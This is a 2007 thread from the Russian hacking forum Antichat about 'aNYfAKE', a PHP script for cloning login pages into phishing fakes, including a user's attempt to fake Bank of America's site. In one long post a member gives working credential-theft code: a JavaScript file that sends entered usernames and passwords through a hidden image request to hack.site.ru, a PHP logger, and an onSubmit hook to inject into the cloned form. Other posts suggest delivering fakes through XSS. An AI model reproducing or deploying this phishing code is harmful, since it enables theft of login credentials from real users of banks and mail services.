Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Избранное (https://forum.antichat.xyz/forumdisplay.php?f=89)
-   -   aNYfAKE v1.0 betka (https://forum.antichat.xyz/showthread.php?t=44845)

_kREveDKo_ 20.07.2007 03:39

aNYfAKE v1.1
 
Вложений: 1

Как настроить читаем на главной странице либо на скрине

Скачать: aNYfAKE_v.1.1.rar | Official
Кому жалко меня, мои деньги и мой трафф: aNYfAKE_v.1.1.rar | Rapidshare.com

_Master- 20.07.2007 13:05

Офигеть =) То, что мне нужно было :) Вот только один недочет вроде есть-на примере майл.ру и его динамическим отображением погоды на примере айпи, то есть если у тебя ай-пишник московский - то при заходе на страницу отображается погода в Москве, если Питерский - то в Питере, но тут айпишник идет сервера на котором стоит скрипт, поэтому у слишком бдительных юзеров может возникнуть подозрение... Это можно как-нибудь исправить?

_kREveDKo_ 21.07.2007 18:55

Конечно можно - настроить скриптенк на работу через проксик нужного города. Только во-первых я думаю это нафик не нужно, потому что если юзер параноик, то скрипт перестаёт работать уже на стадии переадресации (ну то бишь переадресацию и так спалят), ну а во-вторых мне просто-напросто лень, ибо мне ест ьчем ещё заняться =). Вот что планирую ещё добавить - так это урл-спуфинг. Покопаюсь в багтраке и прикручу опциональный спуф урла.

Ещё предложения? Замечания?

LeopardSS 22.07.2007 20:11

у мну Unable to connect to mail.ru

invlose 22.07.2007 20:13

1.все придет к тому что люди не будут знать что ява код надо в теги вставлять.
2.хост не подделывается
можно было тогда замутить с яваскрипт+xss втсавляешь скрипт используя xss и вот фейк..плюс дальнейщая реализация
сорри если не правильно понял)1пост

3.alt+s в опере
дальше в начале странице
<base href=''> и не надо править ссылки кроме как в форме

И соотвественно скачивать ничего не надо(картинки скрипты стили)

_kREveDKo_ 23.07.2007 00:10

Цитата:

Сообщение от invlose
1.все придет к тому что люди не будут знать что ява код надо в теги вставлять.
2.хост не подделывается
можно было тогда замутить с яваскрипт+xss втсавляешь скрипт используя xss и вот фейк..плюс дальнейщая реализация
сорри если не правильно понял)1пост

Вообще нифига невкурил =)))))) Второй пункт примерно, но смутно, так что распиши, если есть конкретные наработки.

А насчёт третьего пункта - скрипт как раз для того и делался по большей части, что ничего не надо сохранять

invlose 23.07.2007 09:01

Пункт 2
Я имел в виду чтобы твой скрипт генерировал скрипт *.js
загружая его используя xss получался бы фейк,ну типа того
1Тут есть тонкости с самой xss и реализацией ....

Насчет пункта три
Я написал )что
1 нужно в начале странице вставить base href (вместо смены всех ссылок)
2 (дополнение
)нужно вставить ссылку на свой внешний ява скрипт(и больше вообще ничего не надо менять,не ссылки,не даже адрес формы)

Единственное что можно генерировать это как раз пути в это ява скрипте(и то скорее всего они будут относительные-так что опять же особо и генерировать ничего не надо)

Т есть если бы я делал под себя
Я бы написал несоклько типов внешних скриптов *.js
и к сниффу прибавил оповещения(что ты и сделал - т е это несколько функций к снифу каника.)

4.если ты скачиваешь,то полезнее было бы сделать базу фейков.

Если остались еще вопросы и ты их хочешь=\мне задать
пиши в лс а лучше в асю (см профиль )

не хочу мешать полезным сообщениям в теме вроде
"прочитал статью+1аффтару"

1SeTh 27.07.2007 07:18

у меня тоже самое Unable to connect to mail.ru

_kREveDKo_ 27.07.2007 14:35

Недавно на mail.ru чёт поменяли. win.mail.ru больше не катит, а индекс нормально не обрабатывается. Поэтому на mail.ru временно не пашет

_kREveDKo_ 27.07.2007 16:17

Цитата:

Сообщение от n3m0
У мну неработает. Просто пустая страница. Убрал error_reporting(0);, выводит ерор
> Fatal error: Maximum execution time of 30 seconds exceeded in /fake/anyfake.php on line 134

Line: $line=ereg_replace($replace, "", $line);

Не думал что понадобится, но наверное надо дописать в начало скрипта
PHP код:

set_time_limit(0); 


_kREveDKo_ 27.07.2007 16:19

Цитата:

Сообщение от Sadden
у меня тоже самое Unable to connect to mail.ru

Сокет не хочет открывать =\ Подумай почему =\\\\

1SeTh 28.07.2007 22:56

and?

_kREveDKo_ 29.07.2007 15:42

Или mail.ru в дауне или нет поддержки сокетов, других вариантов нет

1SeTh 30.07.2007 07:17

а как можно узнать мой фри хост поддерживает сокет или нет? Faq хостинга читать чтоли? Или есть какой нить скприпт для проверки?

blaga 30.07.2007 07:38

Sadden, ты свой хост скажи.

1SeTh 30.07.2007 13:43

Цитата:

Сообщение от blaga
Sadden, ты свой хост скажи.

ho.com.ua (это не реклама)

_kREveDKo_ 30.07.2007 14:40

Да, там сокеты запрещены =\

1SeTh 31.07.2007 06:36

Цитата:

Сообщение от b00zy_c0d3r
Да, там сокеты запрещены =\

а где не запрещены из бесплатных? И как ты узнал что там запрещены сокеты?

_kREveDKo_ 31.07.2007 11:52

Нет такого бесплатного хостинга, где бы были разрешены сокеты, ибо тогда бы этим все злоупотребляли.

1SeTh 01.08.2007 08:01

могли бы поставить лимиты. Наверно такие должны быть.

MasterProg 01.08.2007 12:38

А что если заставить скрипт при запросе удалённой страницы работать как прокси - отсылать заголовок HTTP_X_FORWARDED_FOR? Будет ли, например тот же самый Mail.RU использовать его?

_kREveDKo_ 01.08.2007 16:33

Да, конечно можно, но:

1) Что это нам реально даст
2) Большое множество всяких погодных ресурсов и тому подоюных, которые выдают контент в соответствии с твоим айпишником не смотрят на этот заголовок

Ну если всё-таки есть ещё какая-то причина, то я наверн добавлю =)

4nob1oz 11.08.2007 16:31

Цитата:

Сообщение от b00zy_c0d3r
Нет такого бесплатного хостинга, где бы были разрешены сокеты, ибо тогда бы этим все злоупотребляли.

Да ладно :) Есть, например freeshells.ch и ещё www.rootshell.be

PS: исправил линки.

_kREveDKo_ 11.08.2007 16:51

Первый недоступен, второй проверяю...
З.Ы. тема не про хостинги, так что прекращаем оффтоп =\

remover911 12.08.2007 05:29

ачат фекнулся нормально, а вот это не хочет...

желаемый линк - https://www.bankofamerica.com/index.jsp

настройки -

$fakable_host = 'bankofamerica.com'; // The host where the page is situated

$fakable_path = '/'; // The path to a fakeble page

$fakable_script = 'index.jsp'; // Page for fake. F.e. "login.php"


Цитата:

HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sun, 12 Aug 2007 01:24:55 GMT Content-length: 122 Content-type: text/html Location: http://bankofamerica.com/index.cfm Connection: close
Moved Permanently
An error has occurred.
может изза ССЛ ? или мой серв не хочет конектиццо потому что ему чтото не хватает?

_kREveDKo_ 12.08.2007 17:39

Да, это из-за SSL, потому что я там сокет на 80 порт открываю, а https пашет через 443 кажется. Да и работать с ссл надо по отбельной схеме, если я не ошибаюсь. В общем, посмотрим, если сложным это не окажется, то эту задачу я поставлю в свой список вещей для ДОкодивания =\

А®ТеS 14.08.2007 15:27

2Sadden: 1. там написано должно быть :). 2. php код примерно такой:
PHP код:

<?php
    
if (@socket_create()) {
        echo 
"Socket does not support!";
    }
?>


DRON-ANARCHY 14.08.2007 21:09

Цитата:

+ сокеты (все бесплатники отпадают)
да ладно... тебе сказать бесплатники, с поддержкой сокетов, без рекламы, с cPanel и кучей других примочек? :)

А®ТеS 14.08.2007 21:14

2dron-anarchy: Мне скажи.

1SeTh 16.08.2007 09:55

Цитата:

Сообщение от А®ТеS
2Sadden: 1. там написано должно быть :). 2. php код примерно такой:
PHP код:

<?php
    
if (@socket_create()) {
        echo 
"Socket does not support!";
    }
?>



О чем ты?

NOmeR1 16.08.2007 23:24

Цитата:

Сообщение от Sadden
О чем ты?

Ну просто, проверка, возможна ли работа с сокетами.

DRON-ANARCHY 17.08.2007 14:32

Цитата:

Мне скажи.
поищи в теме про бесплатные хостинги мои посты. Я там по-моему говорил.
я не жадный. ниче не скрываю от вас, други мои))

k1b0rg 17.08.2007 17:23

Да простит меня автор).
Скриптик жесть....Чисто поржать.

Я такую ***ню давно не встречал. Этож как надо пхп испоганить чтобы такое написать =(. Скрипты подобны тем что пишут киберлорды и у зуклон тимы.
Цитата:

// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// Меняем post на get, потому что $_SERVER["QUERY_STRING"] кушает тока пост
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

$full_page = str_replace("method=\"POST\"","method=\"get\"",$fu ll_page);
$full_page = str_replace("method='POST'","method='get'",$full_p age);
$full_page = str_replace("method=POST","method=get",$full_page) ;
$full_page = str_replace("method=\"post\"","method=\"get\"",$fu ll_page);
$full_page = str_replace("method='post'","method='get'",$full_p age);
$full_page = str_replace("method=post","method=get",$full_page) ;
Вот тут я начал истерично ржать. А если на сайте, данные доступны тока через пост?
И еще убила замена через str_replace, тут регулярки нужны а не перечисливать десятки вариаций.

Цитата:

@$sss=fsockopen($fakable_host,80)
Строка убийство.

Цитата:

// - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// Меняем пути к картинкам (придёца юзать сокет 2-й раз)
// - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Бугога.

Цитата:

if(strpos($match[0],"http://")===false)
Ну тут сделаем вид что все заебись.

Цитата:

or die("Бля ошибка, твои пароли не сохранились");
Конструкцию or die надо 100% юзать, ведь при малейшем глюке, жертва должна видеть ,почему ее пароли не остались у хакера.


Цитата:

$line=ereg_replace($replace, "", $line);
Конечно, когда не нужны регулярки, их надо юзать.

Цитата:

$request .= "Content-Type: application/x-www-form-urlencoded\n";
А зачем это в методе GET?

Цитата:

header("Location: $redirect_to");
Тут вижу целых 2 помарки.

"$var" и вторая, это опять что в скрипте есть вывод текста, а хидер не может быть вызван после того как текст отобразился на экране....И тут будет целый камнепад из ошибок скрипта.


Мое резюме: Скрипт полностью не пригоден по работе, возможность того что он спалится, работает пиздец как медленно, сделать фейк вручную быстрее чем настроить этот скрипт.
Вывод: скрипт надо стереть пока его никто не видел.

Цитата:

Да и работать с ссл надо по отбельной схеме, если я не ошибаюсь.
Ды да.

Цитата:

$sock=fsockopen('mail.ru',80,$errno, $errstr); //http
$sock=fsockopen('ssl://mail.ru',443,$errno, $errstr); //https
Вот и вся разница между http и https.


Для тех кто хочет сделать нормальный фейк, объясняю:
Можно сделать два вида фейка, статичный и динамичный. Статичный вы один раз спиздили с сайта html налепили к себе и довольны. Второй динамичный. Каждый раз вы сокетами пиздете html с сайта и изменяет нужные вам данные.

Чем плох фейк от бузи кодера, тем что нарушается работа и структура исходного кода. Потом идёт редирект впустую.

Смысл нормального фейка ,чтобы минимум произвести изменений в сурсе, абсолютно не нарушая его работы. Чтобы данные отослались сразу куда надо, а не на сниффер.

Сделаем это через javascript.

Создаем два постоянных файла sniff.js и sniff.php

sniff.js // Отсылает даные на снифер
Цитата:

function sniff(p)
{
var img = document.createElement("img");
img.src='http://hack.site.ru/sniff.php?account='+p;
img.style.cssText='display: none';
document.body.appendChild(img);
}
sniff.php // Логер
Цитата:

<?php
$file=fopen('log.txt','w');
fwrite($file,$_GET['account']);
fclose($file);
?>
Всё, с нашими файлами закончено. Они будут пригодня для всех фейков, так что трогать их не надо.

Терь будем изменять сурс фейка.

1) Подключаем наш яваскрипт.
Цитата:

<script type="text/javascript" src="http://hack.site.ru/sniff.js"></script>
2) Меняем исходные ссылки, на ссылки на фейк
Цитата:

<base href="http://mail.ru">
3) На форму добавим обработчик OnSubmit
Цитата:

<form name...bla.bla.bla OnSubmit="sniff(this.username.value+':'+this.passw ord.value);">
Как только юзер сделает отправку данных, создатся пустой объект картинки(невидимый), при запросе этой картинки, и сработает сниффер, а данные полетят куда им надо, т.е. никакого посредничества и разрыва нету.
Всё...фейк готов. Для универсальности, можно в логере, для каждого случая писать новый лог. А в обработчеке форм, пиздить не тока известные поля, а перехватывать содержимое ВСЕХ элементов форумы.


Удачи.

_kREveDKo_ 17.08.2007 17:49

Убейте меня. Я жить после такого позора не могу.

k1b0rg 17.08.2007 19:46

Цитата:

Убейте меня. Я жить после такого позора не могу.
Да ладно тебе) все нормально. Со всеми бывает)

DRON-ANARCHY 17.08.2007 20:57

Цитата:

Сообщение от Бузя
Убейте меня. Я жить после такого позора не могу.

не бзди. Ибо тут
>> Скрипты подобны тем что пишут киберлорды и у зуклон тимы.
пропущен еще и мой ник))

Isis 06.01.2008 03:14

aNYfAKE v.1.1


Как настроить читаем на главной странице либо на скрине :)

Скачать: aNYfAKE_v.1.1.rar | Official
Кому жалко меня, мои деньги и мой трафф: aNYfAKE_v.1.1.rar | Rapidshare.com

zloy_admin 06.01.2008 07:56

Isis,
c yahoo не получается... может подскажешь настройки?

Petr 06.01.2008 08:33

Блин я привык руками :)

zloy_admin 06.01.2008 08:45

руками не умею. маленький еще ;)
а вот с помощью проги....
Может кто поможет с настройками?


Время: 03:47